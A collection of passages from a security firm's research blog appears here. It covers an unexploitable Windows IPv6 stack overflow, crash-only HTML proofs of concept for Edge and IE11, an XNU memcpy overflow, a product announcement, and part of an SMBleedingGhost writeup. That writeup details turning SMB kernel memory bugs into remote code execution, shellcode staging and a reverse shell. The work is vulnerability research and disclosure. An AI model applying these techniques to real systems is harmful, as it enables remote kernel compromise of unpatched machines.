The option structure size must be 0x20 bytes. Breaking this assumption is what allows us to trigger the stack overflow, by providing a larger option structure. We can also provide a smaller structure, but that doesn’t have much value in this case.
The Prefix Length field value must be at most 128. Breaking this assumption allows us to set the field to an invalid value in the range of 129-255. This can indeed be used to cause an out-of-bounds data write, but in all such cases that we could find, the out-of-bounds write happens on the stack in a location which is overridden later anyway, so causing such out-of-bounds writes has no practical value.
For example, one such out-of-bounds write happens in tcpip!Ipv6pMakeRouteKey, called by tcpip!IppValidateSetAllRouteParameters.
Option type 24 – Route Information Option
The option structure size must not be larger than 0x18 bytes. Same implications as for option type 3.
The Prefix Length field value must be at most 128. Same implications as for option type 3.
The Prefix Length field value must fit the structure option size. That isn’t really interesting since any value in the range 0-128 is handled correctly. The worst thing that could happen here is a small out-of-bounds read.
Option type 25 – Recursive DNS Server Option
The option structure size must not be smaller than 0x18 bytes. This isn’t interesting, since the size must be at least 8 bytes anyway (the length field is verified to be larger than zero in both loops), and any such structure is handled correctly, even though a size of 8-bytes is not valid according to the specification.
The option structure size must be in the form of 8+n*16 bytes. This check was added after fixing CVE-2020-16898.
Option type 31 – DNS Search List Option
The option structure size must not be smaller than 0x10 bytes. Same implications as for option type 25.
As you can see, there was a slight chance of doing something other than the demonstrated stack overflow by breaking the assumption of the valid prefix length value for option type 3 or 24. Even though it’s literally about smuggling a single bit, sometimes that’s enough. But it looks like this time we weren’t that lucky.
Revisiting the Stack Overflow
Before giving up, we took a closer look at the stack. The POCs that we’ve seen are overriding the stack such that the stack cookie (the __security_cookie value) is overridden, causing a system crash before the function returns.
We checked whether overriding anything on the stack can help achieve code execution before the function returns. That can be a local variable in the “Local variables (2)” space, or any variable in the previous frames that might be referenced inside the function. Unfortunately, we came to the conclusion that all the variables in the “Local variables (2)” space are output buffers that are modified before access, and no data from the previous frames is accessed.
Summary
We conclude with high confidence that CVE-2020-16898 is not exploitable without an additional vulnerability. It is possible that we may have missed something. Any insights / feedback is welcome. Even though we weren’t able to exploit the bug, we enjoyed the research, and we hope that you enjoyed this writeup as well.
Hear the news first
Only essential content
New vulnerabilities & announcements
News from ZecOps Research Team
Your subscription request to ZecOps Blog has been successfully sent.
During yet another Digital Forensics investigation using ZecOps Crash Forensics Platform, we saw a crash of the Legacy (pre-Chromium) Edge browser. The crash was caused by a NULL pointer dereference bug, and we concluded that the root cause was a benign bug of the browser. Nevertheless, we thought that it would be a nice showcase of a crash reproduction.
Amusingly, the browser crashed in the CMediaElement::IsSafeToUse function. Apparently, the answer is no – it isn’t safe to use.
Crash reproduction
The stack trace indicates that the function that was executed by the JavaScript code, and eventually caused the crash, was removeSourceBuffer, part of the MediaSource Web API. Looking for a convenient example to play with, we stumbled upon this page which uses the counterpart function, addSourceBuffer. We added a button that calls removeSourceBuffer and tried it out.
Just calling removeSourceBuffer didn’t cause a crash (otherwise it would be too easy, right?). To see how far we got, we attached a debugger and put a breakpoint on the edgehtml!CMediaSourceExtension::Var_removeSourceBuffer function, then did some stepping. We saw that the CSourceBuffer::RemoveAllTracksHelper function is not being called at all. What tracks does it help to remove?
After some searching, we learned that there’s the HTML <track> element that allows us to specify textual data, such as subtitles, for a media element. We added such an element to our sample video and bingo! Edge crashed just as we hoped.
Crash reason
Our best guess is that the crash happens because the CTextTrackList::GetTrackCount function returns an incorrect value. In our case, it returns 2 instead of 1. An iteration is then made, and the CTextTrackList::GetTrackNoRef function is called with index values from 0 to the track count (simplified):
int count = CTextTrackList::GetTrackCount();
for (int i = 0; i < count; i++) {
CTextTrackList::GetTrackNoRef(..., i);
/* more code... */
}
While it may look like an out-of-bounds bug, it isn’t. GetTrackNoRef returns an error for an invalid index, and for index=1 (in our case), a valid object is returned, it’s just that one of its fields is a NULL pointer. Perhaps the last value in the array is some kind of a sentinel value which was not supposed to be part of the iteration.
Exploitation
The bug is not exploitable, and can only cause a slight inconvenience by crashing the browser tab.
POC
Here’s a POC that demonstrates the crash. Save it as an html file, and place the test.mp4, foo.vtt files in the same folder.
Tested version:
Microsoft Edge 44.18362.449.0
Microsoft EdgeHTML 18.18363
<button>Crash</button>
<br><br><br>
<video autoplay controls playsinline>
<!-- https://gist.github.com/Michael-ZecOps/046e2c97d208a0a6da2f81c3812f7d5d -->
<track label="English" kind="subtitles" srclang="en" src="foo.vtt" default>
</video>
<script>
// Based on: https://simpl.info/mse/
var FILE = 'test.mp4'; // https://w3c-test.org/media-source/mp4/test.mp4
var video = document.querySelector('video');
var mediaSource = new MediaSource();
video.src = window.URL.createObjectURL(mediaSource);
mediaSource.addEventListener('sourceopen', function () {
var sourceBuffer = mediaSource.addSourceBuffer('video/mp4; codecs="mp4a.40.2,avc1.4d400d"');
var button = document.querySelector('button');
button.onclick = () => mediaSource.removeSourceBuffer(mediaSource.sourceBuffers[0]);
get(FILE, function (uInt8Array) {
var file = new Blob([uInt8Array], {
type: 'video/mp4'
});
var reader = new FileReader();
reader.onload = function (e) {
sourceBuffer.appendBuffer(new Uint8Array(e.target.result));
sourceBuffer.addEventListener('updateend', function () {
if (!sourceBuffer.updating && mediaSource.readyState === 'open') {
mediaSource.endOfStream();
}
});
};
reader.readAsArrayBuffer(file);
});
}, false);
function get(url, callback) {
var xhr = new XMLHttpRequest();
xhr.open('GET', url, true);
xhr.responseType = 'arraybuffer';
xhr.send();
xhr.onload = function () {
if (xhr.status !== 200) {
alert('Unexpected status code ' + xhr.status + ' for ' + url);
return false;
}
callback(new Uint8Array(xhr.response));
};
}
</script>
Does mobile DFIR research interest you?
ZecOps is expanding. We’re looking for additional researchers to join ZecOps Research Team. If you’re interested, send us a note at [email protected].
Hear the news first
Only essential content
New vulnerabilities & announcements
News from ZecOps Research Team
Your subscription request to ZecOps Blog has been successfully sent.
During a DFIR investigation, using ZecOps Crash Forensics on a developer’s computer we encountered a consistent crash on Internet Explorer 11. The TL;DR is that albeit this bug is not exploitable, it presents an interesting expansion to the attack surface through the Developer Consoles on browsers.
While examining the stack trace, we noticed a JavaScript engine failure. The type of the exception was a null pointer dereference, which is typically not alarming. We investigated further to understand whether this event can be exploited.
Initially ecx is the “this” pointer of the called member function’s class. On the first dereference we get a zeroed region, on the second dereference we get NULL, and on the third one we crash.
Reproduction
We tried to reproduce a legit call to mshtml!CDiagnosticsElementEventHelper::OnDOMEventListenerRemoved2to see how it looks in a non-crashing scenario. We came to the conclusion that the event is called only when the IE Developer Tools window is open with the Events tab.
We found out that when the dev tools Events tab is opened, it subscribes to events for added and removed event listeners. When the dev tools window is closed, the event consumer is freed without unsubscribing, causing a use-after-free bug which results in a null dereference crash.
Summary
Tools such as Developer Options dynamically add additional complexity to the process and may open up additional attack surfaces.
Exploitation
Even though Use-After-Free (UAF) bugs can often be exploited for arbitrary code execution, this bug is not exploitable due to MemGC mitigation. The freed memory block is zeroed, but not deallocated while other valid objects still point to it. As a result, the referenced pointer is always a NULL pointer, leading to a non-exploitable crash.
Responsible Disclosure
We reported this issue to Microsoft, that decided to not fix this UAF issue.
POC
Below is a small HTML page that demonstrates the concept and leads to a crash. Tested IE11 version: 11.592.18362.0 Update Versions: 11.0.170 (KB4534251)
<!DOCTYPE html>
<html>
<body>
<pre>
1. Open dev tools
2. Go to Events tab
3. Close dev tools
4. Click on Enable
</pre>
<button onclick="setHandler()">Enable</button>
<button onclick="removeHandler()">Disable</button>
<p id="demo"></p>
<script>
function myFunction() {
document.getElementById("demo").innerHTML = Math.random();
}
function setHandler() {
document.body.addEventListener("mousemove", myFunction);
}
function removeHandler() {
document.body.removeEventListener("mousemove", myFunction);
}
</script>
</body>
</html>
Interested in researching browser & OS bugs daily?
ZecOps is expanding. We’re looking for additional researchers to join ZecOps Research Team. If you’re interested, send us a note at [email protected]
Hear the news first
Only essential content
New vulnerabilities & announcements
News from ZecOps Research Team
Your subscription request to ZecOps Blog has been successfully sent.
ZecOps is excited to announce the release of ZecOps for Mobile 2.0, which includes full support for Android. With this release, ZecOps has extended its best-in-class automatic digital forensics capabilities to the two most widespread and important mobile operating systems in the world, iOS and Android.
We see it in the news everyday: sophisticated threat actors can bypass all existing security defenses. These mistakes lead to sudden reboots, crashes, appearances in logs / OS telemetry, bugs, errors, battery loss, and other “unexplained” anomalies. ZecOps for Mobile analyzes the associated events against databases of attack techniques, common weaknesses (CWEs), and common vulnerabilities (CVEs). ZecOps’s core technology utilizes machine learning for insights, correlation and identifying anomalous behavior for 0-day attacks. Following a quick investigation, ZecOps produces a detailed assessment of if, when, and how a mobile device has been compromised.
World-leading governments, defense agencies, enterprises, and VIPs rely on ZecOps to automate their advanced investigations, greatly improving their threat intelligence, threat detection, APT hunting, and risk & compromise assessment capabilities. With support for Android, ZecOps can now extend this threat intelligence across an entire organization’s mobile footprint.
Supported versions:
Android 8 and above – until latest
iOS 10 and above – until latest
Supported HW Models:
All device models are supported on both Android and iOS.
ZecOps provides the most thoroughoperating system telemetry analysis as part of its advanced digital forensics. By focusing on the trails that hackers leave (“Attackers’ Mistakes”), ZecOps can provide sophisticated security organizations with critical information on the attackers’ tools, advanced persistent threats, and even discovery of attacks leveraging zero-day vulnerabilities.
In the past few years XNU had few vulns in a newly added/changed code areas (extra_recipe, kq double release) and in the content filter area (bug collision uaf, silent patched uaf) so it is no surprise that the combination of the newly added code and complex areas (content-filter) alongside with a funny comment caught our attention.
0x1- Discovery story
Upon a closer look at the newly added xnu source of Darwin 19 you might notice a strange comment in content_filter.c:
/*
* TO DO LIST
*
* SOONER:
*
* Deal with OOB
*
* LATER:
*
* If support datagram, enqueue control and address mbufs as well
*/
Is this comment referring to OOB read/write issues? Probably not but it won’t hurt to run a quick search for those so we will use the magic tool CMD +f to search for memcpy calls and in less than two minutes you will find the following
0x2- The bug.
The newly updated cfil_sock_attach function which is easily reached from tcp_usr_connect and tcp_usr_connectx with controlled variables:
errno_t
cfil_sock_attach(struct socket *so, struct sockaddr *local, struct sockaddr *remote, int dir) // (Part A)
{
errno_t error = 0;
uint32_t filter_control_unit;
socket_lock_assert_owned(so);
/* Limit ourselves to TCP that are not MPTCP subflows */
if ((so->so_proto->pr_domain->dom_family != PF_INET &&
so->so_proto->pr_domain->dom_family != PF_INET6) ||
so->so_proto->pr_type != SOCK_STREAM ||
so->so_proto->pr_protocol != IPPROTO_TCP ||
(so->so_flags & SOF_MP_SUBFLOW) != 0 ||
(so->so_flags1 & SOF1_CONTENT_FILTER_SKIP) != 0) {
goto done;
}
filter_control_unit = necp_socket_get_content_filter_control_unit(so);
if (filter_control_unit == 0) {
goto done;
}
if (filter_control_unit == NECP_FILTER_UNIT_NO_FILTER) {
goto done;
}
if ((filter_control_unit & NECP_MASK_USERSPACE_ONLY) != 0) {
OSIncrementAtomic(&cfil_stats.cfs_sock_userspace_only);
goto done;
}
if (cfil_active_count == 0) {
OSIncrementAtomic(&cfil_stats.cfs_sock_attach_in_vain);
goto done;
}
if (so->so_cfil != NULL) {
OSIncrementAtomic(&cfil_stats.cfs_sock_attach_already);
CFIL_LOG(LOG_ERR, "already attached");
} else {
cfil_info_alloc(so, NULL);
if (so->so_cfil == NULL) {
error = ENOMEM;
OSIncrementAtomic(&cfil_stats.cfs_sock_attach_no_mem);
goto done;
}
so->so_cfil->cfi_dir = dir;
}
if (cfil_info_attach_unit(so, filter_control_unit, so->so_cfil) == 0) {
CFIL_LOG(LOG_ERR, "cfil_info_attach_unit(%u) failed",
filter_control_unit);
OSIncrementAtomic(&cfil_stats.cfs_sock_attach_failed);
goto done;
}
CFIL_LOG(LOG_INFO, "so %llx filter_control_unit %u sockID %llx",
(uint64_t)VM_KERNEL_ADDRPERM(so),
filter_control_unit, so->so_cfil->cfi_sock_id);
so->so_flags |= SOF_CONTENT_FILTER;
OSIncrementAtomic(&cfil_stats.cfs_sock_attached);
/* Hold a reference on the socket */
so->so_usecount++;
/*
* Save passed addresses for attach event msg (in case resend
* is needed.
*/
if (remote != NULL) {
memcpy(&so->so_cfil->cfi_so_attach_faddr, remote, remote->sa_len); // Part B
}
if (local != NULL) {
memcpy(&so->so_cfil->cfi_so_attach_laddr, local, local->sa_len); // Part C
}
error = cfil_dispatch_attach_event(so, so->so_cfil, 0, dir);
/* We can recover from flow control or out of memory errors */
if (error == ENOBUFS || error == ENOMEM) {
error = 0;
} else if (error != 0) {
goto done;
}
CFIL_INFO_VERIFY(so->so_cfil);
done:
return error;
}
We can see that in (Part A) the function receives two sockaddrs parameters (local and remote) which are user controlled and then using their sa_len struct member (remote in (Part B) and local in (Part C)) in order to copy data to cfi_so_attach_laddr and cfi_so_attach_faddr. Parts (A) (B) and (C) were all result of a new changes in XNU.
So what’s the problem? The problem is there is lack of check of sa_len which can be set up to 255 and then will be used in a memcpy to copy data into a union sockaddr_in_4_6 which is a 28 bytes struct – resulting in a buffer overflow.
The PoC below which is almost identical to Ian Beer’s mptcp with two changes. This POC requires a pre-requisite to reach the vulnerable area. In order to trigger the vulnerability we need to use an MDM enrolled device with NECP policy, or attach the socket to a valid filter_control_unit. One way to do it is to create one with cfilutil and then manually write it to kernel memory using a kernel debugger.
Here is a picture of the vulnerable part in macOS 10.15.1 compiled kernel (before the issue was reported):
Here is a picture of the vulnerable part in macOS 10.15.6 compiled kernel (after the issue was reported):
The panic call with the mecmpy_chk is gone alongside the patch!
Did the original developer knew this function was vulnerable and placed it there as a placeholder until a proper patch? Your guess is good as ours.
Also note that the call to memcpy_chk before the real_mode_bootstarp_end (which is a wraparound of memcpy) is what kept this issue from being exploitable.
0x4- What can we take from this?
Read comments they might give us valuable information
Newly added code is oftentimes buggy
Content filter code is complex and tricky
Now with Pangu’s recent blog post and Ian Beer mptcp bug we can learn that sockaddr->sa_len already caused multiple issues and should be audited a bit more carefully.
0x5- Attacks in the wild?
This issue is not dangerous. During our investigation of this bug, ZecOps checked its targeted threats intelligence database, and saw no active attacks associated with this issue. We still advise to update to the latest version to receive all other updates.
Hear the news first
Only essential content
New vulnerabilities & announcements
News from ZecOps Research Team
Your subscription request to ZecOps Blog has been successfully sent.
In the previous part of the series, SMBleedingGhost Writeup Part II: Unauthenticated Memory Read – Preparing the Ground for an RCE, we described two techniques that allow us to read uninitialized memory from the pool buffers allocated by the SrvNetAllocateBuffer function of the srvnet.sys module. The first technique accomplishes that by crafting a special SMB packet and deducing information from the server’s response. The second technique, which has less limitations, does that by sending specially crafted compressed data and deducing information depending on whether the server drops the connection.
The next thing we had to understand was: what can be done with this reading ability? As a reminder, we began this research with a write-what-where primitive that we demonstrated in our previous research about achieving local privilege escalation. Since most of the memory layout in the modern Windows versions is randomized, we need to have at least one pointer to be able to do something useful with the write-what-where primitive. Unfortunately, memory allocated with the SrvNetAllocateBuffer function is mostly used for network data such as SMB packets and doesn’t contain system pointers. We could try and read uninitialized memory left by a previous allocation that wasn’t done with SrvNetAllocateBuffer, but it would be difficult to predict where to look for a pointer in this case, especially since we can’t run code on the target computer that could help us grooming the pool (unlike in the case of a local privilege escalation, for example). So we started looking for something more reliable.
Hear the news first
Only essential content
New vulnerabilities & announcements
News from ZecOps Research Team
Your subscription request to ZecOps Blog has been successfully sent.
SrvNetAllocateBuffer and the allocated buffer layout
As we already mentioned in our local privilege escalation research, the SrvNetAllocateBuffer function doesn’t just return a buffer with the requested size. Instead, it returns a pointer to a struct that is located at the bottom of the pool-allocated memory block, containing information about the allocated buffer. The layout of the pool-allocated memory block is the following:
While our reading technique can only read bytes from the “User buffer” region, we can use the integer overflow bug to copy parts of the SRVNET_BUFFER_HDR struct to the “User buffer” region of another buffer, which we can then read. We can do that by setting the Offset field to point at the SRVNET_BUFFER_HDR struct beyond the data we want to read. We just need to make sure that the data that is located there can be interpreted as valid compressed data, otherwise the copying won’t happen.
Hunting for pointers
Let’s take a look at the fields of the SRVNET_BUFFER_HDR struct and see whether there’s something worth reading:
#pragma pack(push, 1)
struct SRVNET_BUFFER_HDR {
/*00*/ (orange) LIST_ENTRY ConnectionBufferList;
/*10*/ WORD BufferFlags; // 0x01 - no transport header, 0x02 - part of a lookaside list
/*12*/ WORD LookasideListIndex; // 0 to 8
/*14*/ WORD LookasideListLogicalProcessor;
/*16*/ WORD TracingDataCount; // 0, 1 or 2, for TracingPtr1/2, TracingUnknown1/2
/*18*/ (blue) PBYTE UserBufferPtr;
/*20*/ DWORD UserBufferSizeAllocated;
/*24*/ DWORD UserBufferSizeUsed;
/*28*/ DWORD PoolAllocationSize;
/*2C*/ BYTE unknown1[4];
/*30*/ (blue) PBYTE PoolAllocationPtr;
/*38*/ (blue) PMDL pMdl1;
/*40*/ DWORD BytesProcessed;
/*44*/ BYTE unknown2[4];
/*48*/ SIZE_T BytesReceived;
/*50*/ (blue) PMDL pMdl2;
/*58*/ (orange) PVOID pSrvNetWskStruct;
/*60*/ DWORD SmbFlags;
/*64*/ (orange) PVOID TracingPtr1;
/*6C*/ SIZE_T TracingUnknown1;
/*74*/ (orange) PVOID TracingPtr2;
/*7C*/ SIZE_T TracingUnknown2;
/*84*/ BYTE unknown3[12];
};
#pragma pack(pop)
The colored variables are pointers. The blue-colored pointers all point inside the pool-allocated memory block, with offsets which can be calculated in advance, so it’s enough to read one of them. Having an absolute pointer to the pool-allocated memory block will surely be helpful. Regarding the orange-colored pointers:
ConnectionBufferList – A linked list of all of the received, unhandled buffers of a connection. The list head is a part of the connection object created by the SrvNetAllocateConnection function in srvnet.sys. A buffer is added to the list by the SrvNetWskReceiveComplete function. In our case, there will be only one buffer in the list, so both pointers (Flink and Blink of the LIST_ENTRY struct) will point to the list head inside the connection object.
pSrvNetWskStruct – Initially, a pointer to the connection object mentioned above. The pointer is set by the SrvNetWskReceiveEvent function, but is overridden by the SrvNetWskReceiveComplete function with the pointer to the SRVNET_BUFFER_HDR struct. Thus, reading it is not more useful than reading one of the other blue-colored pointers. By the way, if you search for “pSrvNetWskStruct“ you’ll find out that it played a role in exploiting EternalBlue.
TracingPtr1/2 – These pointers are only used when tracing is enabled, as it seems.
As you can see, the only other useful pointer for us to read is one of the pointers from the ConnectionBufferList struct. Both pointers (Blink and Flink of the LIST_ENTRY struct) point to the connection object. The object struct has been named SRVNET_RECV by EternalBlue researchers, so we’ll use this name as well.
Getting a module base address
Now that we know how to get the two pointers – a pointer to a pool-allocated memory block and a pointer to an SRVNET_RECV struct – we can freely modify the two buffers using the write-what-where primitive. There are probably several ways from this point to achieve RCE, but we had a feeling that getting a base address of a module would be the most straightforward option since there are so many things we can modify in a data section of a module. As we’ve seen, none of the pointers in a memory block allocated by SrvNetAllocateBuffer point to a module. We had hopes for the SRVNET_RECV struct, but we didn’t find pointers that point to a module there, too. On the bright side, there are several pointers to modules one additional dereference away:
At this point, we noticed that since we can override those pointers in SRVNET_RECT, we can call an arbitrary function by replacing the HandlerFunctions pointer and triggering one of the events, e.g. closing the connection so that Srv2DisconnectHandler is called. This will come in handy later, but we didn’t have any function pointers to call yet, so we continued with our attempt to get a module base address.
Unlike writing, reading those pointers is not as easy since our technique allows us to read only from the “User buffer” region. So close, yet so far. Since we can get and modify a pool-allocated memory block and an SRVNET_RECV struct, we hoped to find code that we can trigger that does a double-dereference-read followed by a double-dereference-write with two variables that we control, similar to the following:
ptr1 = *(pSrvNetRecv + offset1)
value = *ptr1
ptr2 = *(pSrvNetRecv + offset2)
*ptr2 = value
If we could find such a snippet, we would trigger it to copy the first pointer (e.g. HandlerFunctions) to the “User buffer” region, read it, then copy the second pointer (e.g. the Srv2ConnectHandler function pointer) to the “User buffer” region and read it as well, deducing the module base address from it. We searched for such a snippet for a long time, but didn’t find a good match. Finally, we settled for a sub-optimal option which nevertheless worked. Let’s take a look at the relevant part of the SrvNetFreeBuffer function (simplified):
Upon freeing the buffer, if buffer flags 0x02 (means the buffer is part of a lookaside list) and 0x01 (means the buffer has no transport header) are set, some operations are made on the two MDL objects to add the transport header before resetting the flags to zero and returning the buffer back to the lookaside list. If we set aside the meaning behind the operations on the MDL objects for a moment and look at the operations in terms of memory manipulation, we can notice that the code does a double-dereference-read followed by a double-dereference-write with two variables that we control (the two MDL pointers), which is what we were looking for. The downside is that the content that we want to read from is also modified (lines 13-16, 29), a side effect we hoped to avoid.
Given the above, here’s how we managed to read the AcceptSocket pointer:
1. Prepare buffer A from a lookaside list such that the “User buffer” region is filled with zeros. This buffer will end up holding the pointer that we’ll eventually read.
2. Prepare buffer B from a different lookaside list such that:
The pMdl1 pointer points at the address of the HandlerFunctions pointer minus 0x18, the offset of MappedSystemVa in the MDL struct.
The pMdl2 pointer points at the “User buffer” region of Buffer A.
The Flags field is set to 0x03.
We can override the SRVNET_BUFFER_HDR struct fields by decompressing them from a larger buffer using the technique described in the Observation #2 section of the previous part of the writeup.
3. When buffer B is freed, the following operations will take place:
The MDL flags will be read from the second MDL at buffer A. If the MDL_PARTIAL_HAS_BEEN_MAPPED flag is set, MmUnmapLockedPages will be called and the system will likely crash. That’s why we filled the buffer with zeros in step 1.
The HandlerFunctions pointer and the memory around it will be modified as depicted here:
The HandlerFunctions pointer and the memory around it will be read as depicted here:
+00 | __ __ __ __ __ __ __ __
+08 | __ __ __ __ __ __ __ __
+10 | __ __ __ __ __ __ __ __
+18 | ab cd ef gh ij kl mn op <-- HandlerFunctions
+20 | __ __ __ __ __ __ __ __
+28 | qr st uv wx __ __ __ __
The “User buffer” region of buffer A will be modified as depicted here: (The orange-colored bytes contain the pointer we want to read. We just need to order them properly.)
4. Read the AcceptSocket pointer from the “User buffer” region of buffer A.
The good news: we managed to read the pointer. The bad news: we corrupted some data in the SRVNET_RECT struct. Luckily for us, the corruption doesn’t affect the system as long as nothing happens with the relevant connection. When something does happen, e.g. the connection closes, the system crashes. That’s not a problem since we’ll get RCE soon, and we can fix the corruption if we want to. We didn’t implement such a fix in our POC and such fix was left as an exercise for the reader.
After reading the AcceptSocket pointer, we used the same technique to read the srvnet!SrvNetWskConnDispatch pointer. We read the AcceptSocket pointer and not the HandlerFunctions pointer since the array of handler functions is shared between all connections, while the buffer pointed by AcceptSocket is not shared with other connections. Therefore, we can corrupt the latter, affecting the stability of only a single connection.
If we have a copy of the srvnet.sys file used on the target computer, we can just compute the offset of the SrvNetWskConnDispatch pointer in the module locally and subtract the offset from the pointer we read, getting the srvnet.sys module base address as a result. That’s what we did in our POC to keep things simple. One can improve it to be more general. One option that comes to mind is keeping several versions of srvnet.sys locally, and deducing the correct one by the least significant bytes of the read pointer.
Implementing arbitrary read
From the beginning of this research we had a convenient write-what-where (arbitrary write) primitive, but had nothing that allowed us to read memory. We worked hard until now to gain some memory reading abilities, and at this point we felt that we had enough tools to make our life easier and implement a convenient arbitrary read primitive. We began by exploring the possibilities of calling an arbitrary function.
Given that we have the base address of the srvnet.sys module, we can call any of the module’s functions. But what about the function’s arguments? The srv2!Srv2ReceiveHandler function is called by SrvNetCommonReceiveHandler, and the call looks like this:
The first two arguments are read from the SRVNET_RECT struct, so we can control them. We don’t have as much control over the other arguments. The x86-64 calling convention specifies that it’s the caller’s responsibility to allocate and free the stack space for the arguments, so even though a 8-arguments function is intended to be called, we can replace the pointer with a function that expects any other amount of arguments, and it will work.
Here are the steps we used to trigger the function call:
Send a specially crafted message so that the connection’s SRVNET_RECT struct pointer will be copied to a buffer we can read.
Send another, valid message, which will reuse the same SRVNET_RECT struct, but don’t close the connection yet. Note that when a connection is closed, the SRVNET_RECT struct is not freed. The SrvNetPrepareConnectionForReuse function is called to reset the struct so that it can be reused for the next connection.
Read the SRVNET_RECT struct pointer that we copied in step 1.
Replace the HandlerFunctions pointer and the arguments using the write-what-where primitive.
Send an additional message over the connection from step 2 so that the function that took the place of srv2!Srv2ReceiveHandler is called.
Now all we had to do was to find a convenient function to copy memory from one location to another, so that we can copy arbitrary memory to the pool buffer we can read from. memcpy comes to mind, and srvnet.sys does have such a function (memmove, to be precise), but this function requires a third argument, the amount of bytes to be copied, which we don’t control. Failing to find a convenient function that requires one or two arguments, we realized that we’re not limited by functions implemented in srvnet.sys, we can also call functions from srvnet’s import table by pointing HandlerFunctions at the right offset. There, we found the perfect function: RtlCopyUnicodeString.
The RtlCopyUnicodeString function gets two UNICODE_STRING pointers as arguments, and copies the content of the source string to the destination string. Unlike C strings which are NULL-terminated, strings in the kernel are defined by the UNICODE_STRING struct which holds a pointer to the string, and the string’s length in bytes. The string buffer can hold any binary data. If you peek at the implementation of RtlCopyUnicodeString, you can see that the copying is done with the memmove function, i.e. plain binary data copying. All we have to do is prepare our two UNICODE_STRING structs and call RtlCopyUnicodeString, then read the copied data:
Executing shellcode
After achieving a convenient arbitrary read primitive, we moved on to the next challenge towards our goal of remote code execution: running a shellcode. We used the technique that Morten Schenk presented in his Black Hat USA 2017 talk (pages 47-51).
The idea is to write a shellcode below the KUSER_SHARED_DATA structure which is located at a constant address, the only address that is not randomized in the kernel memory layout of the recent Windows versions. Then modify the relevant page table entry, making the page executable. The base address of the page table entries in the kernel is randomized, but can be retrieved from the MiGetPteAddress function in ntoskrnl.exe. Here are the steps we used to execute our shellcode:
Use our arbitrary read primitive to get the base address of ntoskrnl.exe from srvnet’s import table.
Read the base address of the page table entries from the MiGetPteAddress function, as described in Morten’s slides.
Write the shellcode at address KUSER_SHARED_DATA + 0x800 (0xFFFFF78000000800). Note that we could also use one of the pool buffers, using KUSER_SHARED_DATA is just more convenient.
Calculate the relevant page table entry address and clear the NX bit to allow execution, as described in Morten’s slides.
Call the shellcode using our ability to call an arbitrary function.
Launching a reverse shell
Technically, we achieved remote code execution, so we could stop here. But if we’re not popping calc or launching a reverse shell, the POC is not complete, so we went on to fill that gap. Since our shellcode runs in kernel mode, we can’t just run cmd.exe or calc.exe and call it a day. We needed to find a way to get our code to run in user mode. While searching for prior work on the topic we found sleepya’s shellcode, written originally for EternalBlue exploits, which is designed to do just that.
In short, here’s what the shellcode does:
Hook IA32_LSTAR MSR to lower the IRQL (Interrupt Request Level) from DISPATCH_LEVEL to PASSIVE_LEVEL. The shellcode begins execution at the DISPATCH_LEVEL IRQL which imposes several limitations. For more information see the great explanation of zerosum0x0.
Find a privileged user mode process (lsass.exe or spoolsv.exe) and queue a user mode APC in one of the alertable threads that is in waiting state.
In the APC kernel routine, allocate EXECUTE_READWRITE memory and point the APC normal (user mode) routine there. Then copy the user mode shellcode to the newly allocated memory, prepended with a stub to create a new thread.
In the APC normal routine a new thread is created, executing the user mode shellcode.
Published about three years ago, the shellcode didn’t work right away on recent Windows versions, so we had to make a couple of adjustments:
Incompatibility with the KVA Shadow mitigation. In the blog post Fixing Remote Windows Kernel Payloads to Bypass Meltdown KVA Shadow zerosum0x0 explains why the first part of the shellcode, IA32_LSTAR MSR hooking, isn’t supported when the KVA Shadow mitigation is enabled, and proposes a fix. We tried the proposed fix, but it didn’t work on newer Windows versions – zerosum0x0 targeted Windows 10 version 1809 while we were targeting versions 1903 and 1909. The right thing to do is to improve the fix or find another solution, but we just removed the IRQL lowering part. As a result, the POC can sometimes crash the system while trying to access paged memory (bug check IRQL_NOT_LESS_OR_EQUAL), but it doesn’t happen often, so we left it as is since it’s good enough for a POC.
Fixed finding the base address of ntoskrnl.exe. At first, we tried using zerosum0x0’s method – get an address of the first ISR (Interrupt Service Routine), which is located in ntoskrnl.exe, and search for a nearby PE header. The method didn’t work for us since the ISR pointer points to ntoskrnl’s INITKDBG section which is not mapped. Since we already found the ntoskrnl.exe base address, we fixed it by just passing it as an argument to the shellcode.
Fixed a problem with finding the offset of ETHREAD.ThreadListEntry. The original code looked for the current thread in the thread list of the current process. The thread won’t be found if the current thread is attached to a different process than the one it was originally created in (see KeStackAttachProcess).
Fixed the UserApcPending check in the KAPC_STATE struct for Windows 10 version R5 and newer. Since Windows 10 version R5 UserApcPending shares a byte with the newly added bit value, SpecialUserApcPending.
With the above fixed, we finally managed to make the shellcode work, we just needed to fill in the user mode part of the code to run. We used MSFvenom, the Metasploit payload generator, to generate a user mode shellcode to spawn a reverse shell.
Targets with more than one logical processor
In the Observation #1 section of the previous part of the writeup we assumed that our target has only one logical processor. With this assumption, we could rely on the lookaside lists buffer reusing, knowing that we get the same buffer every time as long as the allocation size is the same. As a reminder, the lookaside lists are created upon initialization, a list for each size and logical processor, as depicted in the following table:
→ Allocation size
↓ Logical Processor
0x1100
0x2100
0x4100
0x8100
0x10100
0x20100
0x40100
0x80100
0x100100
Processor 1
Processor 2
…
…
Processor n
Each cell with the “” symbol is a separate lookaside list.
With more than one logical processor, things are a bit more complicated – we get the same buffer only as long as the allocation is made on the same logical processor. Our first attempt at overcoming this limitation was redundancy. When writing to one of the lookaside list buffers, write multiple times. When reading from one of the lookaside list buffers, read multiple times and choose the most common value. This approach would work if the logical processor usage was distributed evenly, but we found that it’s not the case. We tested our POC in VirtualBox, and from our observations, some logical processors are preferred over others. For a setup of 4 logical cores, here’s the distribution of handling the incoming packet in a test execution:
Logical processor
Incoming packets handled
Logical processor 1
0.2%
Logical processor 2
0.8%
Logical processor 3
7.9%
Logical processor 4
91.1%
Here’s the distribution of handling the decompression:
Logical processor
Decompressions executed
Logical processor 1
13.3%
Logical processor 2
5.1%
Logical processor 3
6.8%
Logical processor 4
74.8%
As you can see, in this specific case logical processor 4 did most of the work. Logical processor 1 handled only 1 out of every 500 incoming packets!
We tweaked the POC such that it sends several packets simultaneously from multiple threads to improve the logical processor usage distribution. We also added error detection, so that if the data that is read doesn’t make sense, another reading attempt is made instead of proceeding and most likely crashing the system. The changes we made were enough to make the POC work with VirtualBox targets with multiple logical processors, but from a quick test the POC doesn’t work with VMware targets or (at least some) physical computers with multiple logical processors. We didn’t try to improve the POC further to support all targets, which we believe can be achieved with a better strategy for a reading and writing order.
If you’d like to study the code, we suggest starting with the initial, less noisy version which was designed for a single logical processor. It can be found in a previous commit here.
ZecOps Detection
